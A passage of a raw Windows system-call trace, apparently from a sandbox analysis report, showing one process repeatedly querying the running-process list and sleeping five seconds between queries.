RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.187] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.246] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 